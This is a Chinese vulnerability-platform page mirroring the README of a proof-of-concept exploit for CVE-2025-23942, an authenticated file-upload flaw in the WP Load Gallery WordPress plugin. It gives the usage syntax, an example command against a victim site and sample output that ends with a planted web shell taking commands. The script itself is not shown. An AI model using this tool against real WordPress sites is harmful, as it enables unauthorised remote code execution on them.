漏洞平台

POC详情： cef97900be9ccb9d3e61f7055c3c9f3503797d6b

来源

https://github.com/Nxploited/CVE-2025-23942-poc

关联漏洞

标题： WordPress plugin WP Load Gallery 代码问题漏洞 (CVE-2025-23942)
描述：WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin WP Load Gallery 2.1.6版本及之前版本存在代码问题漏洞，该漏洞源于不受限制地上传具有危险类型漏洞的文件。

描述

WP Load Gallery <= 2.1.6 - Authenticated (Author+) Arbitrary File Upload

介绍

# WP Load Gallery Exploit (CVE-2025-23942)

## 📌 Description
Unrestricted Upload of File with Dangerous Type vulnerability in NgocCode WP Load Gallery allows Upload a Web Shell to a Web Server. This issue affects WP Load Gallery: from n/a through 2.1.6.

## ⚠️ Vulnerability Details
- **CVE ID:** CVE-2025-23942
- **Affected Plugin:** WP Load Gallery
- **Affected Versions:** Up to **2.1.6**
- **Vulnerability Type:** **Unrestricted File Upload**
- **Severity:** **Critical (9.1 CVSS)**
- **Attack Vector:** **Authenticated (Author+) Remote Code Execution (RCE)**
- **Patch Available:** ❌ (No official patch yet)

## 🚀 Features of the Exploit
✅ **Automated Exploitation** – Extracts nonce, logs in, and uploads the shell automatically.  
✅ **Version Check** – Confirms if the target is vulnerable before exploitation.  
✅ **Error Handling** – Ensures smooth execution even in case of failures.  
✅ **Session Handling** – Uses persistent session management for authentication.  
✅ **Real-time Feedback** – Provides output at each step.

## 🛠️ Requirements
- Python 3.x
- `requests` module (`pip install requests`)
- A valid **WordPress Author+ account** on the target system

## 🔥 Usage
Run the script with the necessary parameters:
```bash
usage: CVE-2025-23942.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit WP Load Gallery - Arbitrary File Upload

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., https://example.com)
  -un USERNAME, --username USERNAME
                        WordPress Username
  -p PASSWORD, --password PASSWORD
                        WordPress Password
```
Example:
```bash
python CVE-2025-23942.py -u http://victim-site.com -un author_user -p password123
```

## 📝 Output Example
```
   _______      ________    ___   ___ ___  _____     ___  ____   ___  _  _ ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|   |__ \|___ \ / _ \| || |__ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ ) | __) | (_) | || |_ ) |
 | |      \ \/ / |  __|______/ /| | | |/ /|___ \______/ / |__ < \__, |__   _/ / 
 | |____   \  /  | |____    / /_| |_| / /_ ___) |    / /_ ___) |  / /   | |/ /_ 
  \_____|   \/   |______|  |____|\___/____|____/    |____|____/  /_/    |_|____|

[+] Checking plugin version...
[+] Detected version: 2.1.6
[+] The target is vulnerable! Proceeding with exploitation...
[+] Logged in successfully.
[+] Extracting wplg_nonce...
[+] Extracted wplg_nonce: a1b2c3d4e5
[+] Uploading shell...
[+] File uploaded successfully!
[+] Shell is accessible at: http://victim-site.com/wp-content/uploads/2025/02/nxploit.php?cmd=id
```

## 📜 Legal Disclaimer
This exploit is intended for **educational and security research purposes only**. Do not use it on systems you do not own or have explicit permission to test. The author is **not responsible** for any misuse of this script. 
( Khaled_alenazi )

文件快照


 [4.0K]  /data/pocs/cef97900be9ccb9d3e61f7055c3c9f3503797d6b
├── [4.0K]  CVE-2025-23942.py
└── [2.9K]  README.md

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。